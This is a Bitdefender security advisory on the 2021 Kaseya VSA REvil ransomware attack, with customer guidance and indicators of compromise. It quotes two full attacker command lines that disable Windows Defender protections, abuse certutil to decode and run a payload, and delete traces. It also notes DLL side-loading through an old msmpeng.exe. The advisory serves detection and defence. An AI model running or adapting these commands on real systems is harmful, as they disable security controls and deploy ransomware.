Advisory on Kaseya VSA Ransomware Attack

Advisory on Kaseya VSA Ransomware Attack

Update: July 13, 2021 -- Kaseya issued a critical security update for VSA users that is available on their site - Kaseya Critical Security Update. We recommend users follow Kaseya's recommended updates as soon as possible. 

- - - - - - - - - - - - - - -

We continue to monitor and analyze the attack using Kaseya Software to deploy a variant of REvil ransomware into a victim’s environment. The attack targeted Kaseya’s managed service provider (MSP) customers, which often provide IT support to small- to medium-size businesses. By targeting MSPsattackers also seek to access and infiltrate the MSP’s customers computer networks.  

Guidance for Bitdefender Customers  

  • Kaseya issued an advisory and has urged their customers to immediately shut down on-premises VSA servers. We recommend that any Kaseya VSA users follow this guidance immediately.  
  • Check on-premises and hybrid environments for known indicators of compromise (IoCs) list of IoCs is below. 
  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert stating that they are monitoring details about the attack against Kaseya VSA and the multiple MSPs that use VSA software. We recommend organizations follow the CISA alert for future updates. 

We continue to monitor and assess any customer impact, and will develop further guidance as appropriate, including how Bitdefender customers can protect or mitigate impacts to affected systems. Our Labs team findings to date indicate Bitdefender solutions detect and block a command line action and delivered payloads used in the attack, thus, protecting customers from this step in the attack. If you are a Kaseya user and believe that you are impacted, please contact us at: gzn-gs@bitdefender.com 

Verified Indicators of Compromise 

  1. Command line executed from Kaseya agent: 

C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe 

and 

C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe 

2. Hashes: 
  • 561cffbaba71a6e8cc1cdceda990ead4, detected by Bitdefender with Gen:Variant.Graftor.952042  from 15.May.2021. This is the main executable (c:\kworking\agent.exe) that is being decoded using certutil.exe 
  • a47cf00aedf769d60d58bfe00c0b5421, detected by Bitdefender with Gen:Variant.Bulz.471680 from 13.May.2021. This is a DLL that is being dropped by the main executable and side loaded using a MS msmpeng.exe executable.  
  • 0293a5d21081a94a5589976b407f5675 – the hash for agent.crt (the content of agent.exe before decryption).

    3. File paths:
  • c:\WaRCoMWorking\agent.crt 
  • c:\\WaRCoMWorking\agent.exe 
  • c:\kworking\agent.exe 
  • c:\kworking\agent.crt 
  • c:\windows\msmpeng.exe (an older version that is vulnerable for DLL side loading). This version is being dropped by the main executable and further used to load the DLL (a47cf00aedf769d60d58bfe00c0b5421). File version: MsMpEng.exe, Microsoft Malware Protection, 4.5.0218.0 

 

Contact an expert

tags


Author


Bitdefender Enterprise

Bitdefender is a cybersecurity leader delivering best-in-class threat prevention, detection, and response solutions worldwide. Guardian over millions of consumer, enterprise, and government environments, Bitdefender is one of the industry’s most trusted experts for eliminating threats, protecting privacy, digital identity and data, and enabling cyber resilience. With deep investments in research and development, Bitdefender Labs discovers hundreds of new threats each minute and validates billions of threat queries daily. The company has pioneered breakthrough innovations in antimalware, IoT security, behavioral analytics, and artificial intelligence and its technology is licensed by more than 180 of the world’s most recognized technology brands. Founded in 2001, Bitdefender has customers in 170+ countries with offices around the world.

View all posts

You might also like

Bookmarks


loader